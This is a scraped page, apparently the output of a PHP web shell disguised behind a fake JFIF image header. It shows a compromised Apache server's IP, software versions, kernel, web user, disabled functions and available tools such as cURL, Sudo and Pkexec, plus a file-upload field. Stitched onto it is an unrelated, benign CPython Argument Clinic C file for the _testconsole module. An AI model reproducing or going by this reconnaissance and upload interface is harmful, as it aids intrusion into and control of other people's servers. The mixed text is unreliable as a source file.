????JFIF??x?x????'
Server IP : 79.136.114.73 / Your IP : 3.148.108.240 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /proc/self/root/home/b8009/Python-3.6.3/PC/clinic/ |
Upload File : |
/*[clinic input] preserve [clinic start generated code]*/ #if defined(MS_WINDOWS) PyDoc_STRVAR(_testconsole_write_input__doc__, "write_input($module, /, file, s)\n" "--\n" "\n" "Writes UTF-16-LE encoded bytes to the console as if typed by a user."); #define _TESTCONSOLE_WRITE_INPUT_METHODDEF \ {"write_input", (PyCFunction)_testconsole_write_input, METH_FASTCALL, _testconsole_write_input__doc__}, static PyObject * _testconsole_write_input_impl(PyObject *module, PyObject *file, PyBytesObject *s); static PyObject * _testconsole_write_input(PyObject *module, PyObject **args, Py_ssize_t nargs, PyObject *kwnames) { PyObject *return_value = NULL; static const char * const _keywords[] = {"file", "s", NULL}; static _PyArg_Parser _parser = {"OS:write_input", _keywords, 0}; PyObject *file; PyBytesObject *s; if (!_PyArg_ParseStack(args, nargs, kwnames, &_parser, &file, &s)) { goto exit; } return_value = _testconsole_write_input_impl(module, file, s); exit: return return_value; } #endif /* defined(MS_WINDOWS) */ #if defined(MS_WINDOWS) PyDoc_STRVAR(_testconsole_read_output__doc__, "read_output($module, /, file)\n" "--\n" "\n" "Reads a str from the console as written to stdout."); #define _TESTCONSOLE_READ_OUTPUT_METHODDEF \ {"read_output", (PyCFunction)_testconsole_read_output, METH_FASTCALL, _testconsole_read_output__doc__}, static PyObject * _testconsole_read_output_impl(PyObject *module, PyObject *file); static PyObject * _testconsole_read_output(PyObject *module, PyObject **args, Py_ssize_t nargs, PyObject *kwnames) { PyObject *return_value = NULL; static const char * const _keywords[] = {"file", NULL}; static _PyArg_Parser _parser = {"O:read_output", _keywords, 0}; PyObject *file; if (!_PyArg_ParseStack(args, nargs, kwnames, &_parser, &file)) { goto exit; } return_value = _testconsole_read_output_impl(module, file); exit: return return_value; } #endif /* defined(MS_WINDOWS) */ #ifndef _TESTCONSOLE_WRITE_INPUT_METHODDEF #define _TESTCONSOLE_WRITE_INPUT_METHODDEF #endif /* !defined(_TESTCONSOLE_WRITE_INPUT_METHODDEF) */ #ifndef _TESTCONSOLE_READ_OUTPUT_METHODDEF #define _TESTCONSOLE_READ_OUTPUT_METHODDEF #endif /* !defined(_TESTCONSOLE_READ_OUTPUT_METHODDEF) */ /*[clinic end generated code: output=3a8dc0c421807c41 input=a9049054013a1b77]*/